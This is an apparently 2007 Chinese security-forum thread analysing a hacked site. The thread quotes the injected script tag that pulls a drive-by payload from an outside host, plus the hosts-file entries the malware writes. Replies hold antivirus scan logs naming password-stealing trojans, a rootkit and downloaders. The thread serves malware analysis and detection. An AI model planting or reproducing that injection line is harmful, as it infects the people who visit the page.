一个毒网，比较恶劣

allenhippo

难得发毒网，只是这个被挂的有点讽刺了：

hxxp://bbs.aq110.com
网游保镖 自己都难保

<script language=javascript src=http://www.1717av.com/1717.js></script>

原来以为只是普通的挂马站，大不了下十来种盗号木马而已。

想不到花样还不少。

而且中了之后会把这句添加到本地硬盘上所有htm后面。

顺便把host改了：屏蔽的不是安全网站，却是其他毒网：

1. 
   
2. 127.0.0.1      [url]www.97725.com[/url]
   
3. 127.0.0.1      down.97725.com
   
4. 127.0.0.1      ip.315hack.com
   
5. 127.0.0.1      ip.54liumang.com
   
6. 127.0.0.1      [url]www.41ip.com[/url]
   
7. 127.0.0.1      xulao.com
   
8. 127.0.0.1      [url]www.heixiou.com[/url]
   
9. 127.0.0.1      [url]www.9cyy.com[/url]
   
10. 127.0.0.1      [url]www.hunll.com[/url]
    
11. 127.0.0.1      [url]www.down.hunll.com[/url]
    
12. 127.0.0.1      www1.6tan.com
    
13. 127.0.0.1      www2.6tan.com
    
14. 127.0.0.1      do.77276.com
    
15. 127.0.0.1      [url]www.baidulink.com[/url]
    
16. 127.0.0.1      adnx.yygou.cn
    
17. 127.0.0.1      222.73.220.45
    
18. 127.0.0.1      [url]www.f5game.com[/url]
    
19. 127.0.0.1      [url]www.guazhan.cn[/url]
    
20. 127.0.0.1      wm,103715.com
    
21. 127.0.0.1      [url]www.my6688.cn[/url]
    
22. 127.0.0.1      i.96981.com
    
23. 127.0.0.1      d.77276.com
    
24. 127.0.0.1      [url]www.tie2bu.com[/url]
    
25. 127.0.0.1      [url]www.byip.cn[/url]
    
26. 127.0.0.1      178.shen9.net
    
27. 127.0.0.1      [url]www.h-t1.com[/url]
    
28. 127.0.0.1      [url]www.puma164.com[/url]
    
29. 127.0.0.1      [url]www.56jb.com[/url]
    
30. 127.0.0.1      jxdoe.com
    
31. 127.0.0.1      [url]www.08325.cn[/url]
    
32. 127.0.0.1      www1.cw988.cn
    
33. 127.0.0.1      cool.47555.com
    
34. 127.0.0.1      [url]www.asdwc.com[/url]
    
35. 127.0.0.1      55880.cn
    
36. 127.0.0.1      61.152.169.234
    
37. 127.0.0.1      cc.wzxqy.com
    
38. 127.0.0.1      [url]www.54699.com[/url]
    
39. 127.0.0.1      t.gcuj.com
    
40. 127.0.0.1      [url]www.puma163.com[/url]
    
41. 127.0.0.1      ceoww.com
    
42. 127.0.0.1      ad.uiiiu.com
    
43. 127.0.0.1      boolom.com
    
44. 127.0.0.1      [url]www.copyip.com[/url]
    
45. 127.0.0.1      boolom.com
    
46. 127.0.0.1      adult-novel.cn
    
47. 127.0.0.1      ll.chinasese.net
    
48. 127.0.0.1      [url]www.tellumore.com[/url]
    
49. 127.0.0.1      [url]www.o1wg.com[/url]
    
50. 127.0.0.1      [url]www.qq756.com[/url]
    
51. 127.0.0.1      ll.chinasese.net
    
52. 127.0.0.1      cool.47555.com
    
53. 127.0.0.1      [url]www.panama8.com[/url]
    
54. 127.0.0.1      [url]www.zt04.cn[/url]
    
55. 
    

复制代码

样本里的vip[1].exe运行后会释放MSOSVERT.exe，更要命的是会像viking一样会感染所有exe文件（包括网络硬盘），运行后在program files/common files/system下释放自己[:15:] [:15:] [:15:] ，中招了就准备全格式化吧（反正卡巴不能清除，只能删除），虚拟机里执行时，感染了我虚拟机共享目录下的exe文件 ，害得我手忙脚乱了好久。



91C4D2 OR DB82C7 OR B058A2 OR AE4D21 OR 7B7559 OR FA1D0E OR 4E4ED5 OR AEB0AC OR C2CB12 OR AB2A4A OR 2DA5AD OR C1CEBD OR 322471 OR 2F6FB2 OR 7AB429 OR 7F0676 OR E581D7 OR F9AA41 OR 837EDB

[ 本帖最后由 allenhippo 于 2007-7-7 20:22 编辑 ]

小邪邪

（3引擎的）AVK杀18个

[ 本帖最后由 小邪邪 于 2007-7-7 20:27 编辑 ]

小邪邪

里面有熊猫烧香的啊

The EQs

Scan performed at: 2007-7-7 20:26:32
Scanning Log
NOD32 version 2383 (20070706) NT
Command line: C:\Documents and Settings\EQ2\桌面\virus
Operating memory - is OK

Date: 7.7.2007  Time: 20:26:38
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\virus\
C:\Documents and Settings\EQ2\桌面\virus\dllhost32.exe - a variant of Win32/PSW.OnLineGames.RC trojan
C:\Documents and Settings\EQ2\桌面\virus\mosou.exe - probably a variant of Win32/PSW.OnLineGames.RC trojan
C:\Documents and Settings\EQ2\桌面\virus\MSOSVERT.EXE - a variant of Win32/Butileg virus
C:\Documents and Settings\EQ2\桌面\virus\nwizqjsj.exe - a variant of Win32/PSW.OnLineGames.RC trojan
C:\Documents and Settings\EQ2\桌面\virus\nwiztlbu.exe - a variant of Win32/PSW.Agent.NEW trojan
C:\Documents and Settings\EQ2\桌面\virus\nwizwlwzs.exe - a variant of Win32/PSW.Agent.NEW trojan
C:\Documents and Settings\EQ2\桌面\virus\nwizwmgjs.exe - probably a variant of Win32/PSW.OnLineGames.RC trojan
C:\Documents and Settings\EQ2\桌面\virus\nwizzhuxians.exe - a variant of Win32/PSW.Agent.NEW trojan
C:\Documents and Settings\EQ2\桌面\virus\RAV00AE.exe - a variant of Win32/PSW.OnLineGames.NCU trojan
C:\Documents and Settings\EQ2\桌面\virus\Ravasktao.exe - a variant of Win32/PSW.Agent.NEW trojan
C:\Documents and Settings\EQ2\桌面\virus\vip[1].exe - a variant of Win32/Butileg virus
Number of scanned files: 19
Number of threats found: 11
Number of files cleaned: 11
Time of completion: 20:26:40 Total scanning time: 2 sec (00:00:02)

1688388728

病毒: Win32:Onlinegames-ACS [Trj] (9x), Win32:Agent-HOR [Wrm], Win32:Onlinegames-ACL [Trj] (2x), Win32:Onlinegames-AJN [Trj]
文件: virus[1].rar
目录: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LKY2IBN5
进程: GreenBrowser.exe

风雪

费尔13个有两个病毒，两个木马。剩下启发。

aerbeisi

detected: virus Trojan.Generic (modification)        File: dllhost32.exe//PE_Patch//UPack
detected: Trojan program Rootkit.Win32.Agent.fy        File: fOxkb.sys
detected: virus Trojan.Generic (modification)        File: mosou.exe//PE_Patch//UPack
detected: Trojan program Trojan-Downloader.Win32.Small.enp        File: MSOSVERT.EXE//PE_Patch//UPack
detected: virus Trojan.Generic (modification)        File: nwizqjsj.exe//PE_Patch//UPack
detected: virus Trojan.Generic (modification)        File:nwiztlbu.exe//PE_Patch//UPack
detected: virus Trojan.Generic (modification)        File: nwizwlwzs.exe//PE_Patch//UPack
detected: virus Trojan.Generic (modification)        File: nwizwmgjs.exe//PE_Patch//UPack
detected: virus Trojan.Generic (modification)        File: nwizzhuxians.exe//PE_Patch//UPack
detected: virus Trojan.Generic (modification)        File: RAV00AE.exe//PE_Patch//UPack
detected: virus Trojan.Generic (modification)        File: Ravasktao.exe//PE_Patch//UPack
detected: Trojan program Trojan-Downloader.Win32.Small.enp        File:vip[1].exe

有些名字熟啊，见了很多次了，可是卡巴确是启发报啊。看来又是针对卡巴的。

promised

c:\ABC\dllhost32.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
c:\ABC\fOxkb.sys - Signature 'Rootkit.Win32.Agent.fy' found
c:\ABC\hook.dll
c:\ABC\MOSOU.dll - Signature 'Trojan-PWS.Win32.OnLineGames.sl' found
c:\ABC\mosou.exe - Signature 'Trojan-PWS.Win32.Nilage.bjp' found
c:\ABC\MSOSVERT.EXE - Signature 'Trojan-Downloader.Win32.Zlob.and' found
c:\ABC\nwizqjsj.exe - Signature 'Trojan-PWS.Win32.Nilage.bjp' found
c:\ABC\nwiztlbb.dll - Signature 'Trojan-PWS.Win32.OnLineGames.qw' found
c:\ABC\nwiztlbu.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
c:\ABC\nwizwlwzs.dll - Signature 'Trojan-PWS.Win32.OnLineGames.sl' found
c:\ABC\nwizwlwzs.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
c:\ABC\nwizwmgjs.dll - Signature 'Trojan-PWS.Win32.OnLineGames.sl' found
c:\ABC\nwizwmgjs.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
c:\ABC\nwizzhuxians.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
c:\ABC\RAV00AE.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
c:\ABC\Ravasktao.dll - Signature 'Trojan-PWS.Win32.OnLineGames.sl' found
c:\ABC\Ravasktao.exe - Signature 'Trojan-Downloader.Win32.Zlob.and' found
c:\ABC\TempD.exe
c:\ABC\vip[1].exe - Signature 'Trojan-Downloader.Win32.Small.enp' found

        21 Files scanned
          (1 Archiv with 1 file)
        17 Signatures found
        0 Suspect code-parts found
        Used time: 0:00.265

uhthn2002

vba32 啟發了 14個

C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\dllhost32.exe : infected MalwareScope.Trojan-PSW.Game.9
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\fOxkb.sys : infected Rootkit.Win32.Agent.fy
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\MOSOU.dll : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\mosou.exe : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\nwizqjsj.exe : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\nwiztlbb.dll : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\nwiztlbu.exe : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\nwizwlwzs.dll : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\nwizwlwzs.exe : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\nwizwmgjs.dll : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\nwizwmgjs.exe : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\nwizzhuxians.exe : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\RAV00AE.exe : is suspected of Trojan-PSW.Game.3 (paranoid heuristics)
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\Ravasktao.dll : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\Ravasktao.exe : is suspected of Downloader.Small.160
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\TempD.exe : is suspected of Embedded.Rootkit.Win32.Agent.fy
C:\Documents and Settings\uhthn\Desktop\virus.rar:<RAR>\vip[1].exe : infected Trojan.MulDrop.7379


Directories       : 0       Files in archives:      Files on disks:
Archives:                   - total       : 19      - total       : 1     
- scanned         : 1       -  scanned    : 19      - scanned     : 1     
- contain viruses : 1       -  infected   : 3       - infected    : 1     
- deleted         : 0       -  suspicious : 14      - suspicious  : 0

hj5abc

nod32还可以..只少了一个exe.